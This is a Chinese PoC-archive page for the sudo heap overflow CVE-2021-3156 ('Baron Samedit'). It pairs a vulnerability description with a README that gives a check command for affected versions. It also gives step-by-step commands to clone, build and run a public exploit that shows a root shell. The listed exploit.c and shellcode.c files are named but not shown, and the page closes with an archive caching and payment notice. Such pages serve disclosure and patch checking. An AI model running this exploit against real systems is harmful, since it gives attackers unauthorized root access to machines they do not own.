POC详情: e23e8ab1ea5e044558d7e6648d0af50e98d2133d

来源
关联漏洞
标题: Sudo 缓冲区错误漏洞 (CVE-2021-3156)
描述:Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 Sudo 1.9.5p2 之前版本存在缓冲区错误漏洞,攻击者可使用sudoedit -s和一个以单个反斜杠字符结束的命令行参数升级到root。
介绍
CVE-2021-3156
=============

Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via `sudoedit -s` and a command-line argument that ends with a single backslash character.

Credit to: Advisory by [Baron Samedit of Qualys](https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt)

### How to check if you are affected.

[The sudo project](https://www.sudo.ws/alerts/unescape_overflow.html) released a command that allows you to test whether your version of sudo is vulnerable:
```
sudoedit -s '\' `perl -e 'print "A" x 65536'`
```

If you receive a usage or error message, sudo is not vulnerable. If the result is a Segmentation fault, sudo is vulnerable.

### Usage

**Root shell PoC for CVE-2021-3156 (no bruteforce)**
Tested on Ubuntu 20.04 (sudo 1.8.31)
```
$ git clone https://github.com/CyberCommands/CVE-2021-3156.git
$ cd CVE-2021-3156
$ make
mkdir libnss_x
cc -O3 -shared -nostdlib -o libnss_x/x.so.2 shellcode.c
cc -O3 -o exploit exploit.c
$ ./exploit
# whoami
root
```
文件快照

[4.0K] /data/pocs/e23e8ab1ea5e044558d7e6648d0af50e98d2133d ├── [1.9K] exploit.c ├── [1.0K] LICENSE ├── [ 207] Makefile ├── [1.1K] README.md └── [ 598] shellcode.c 0 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。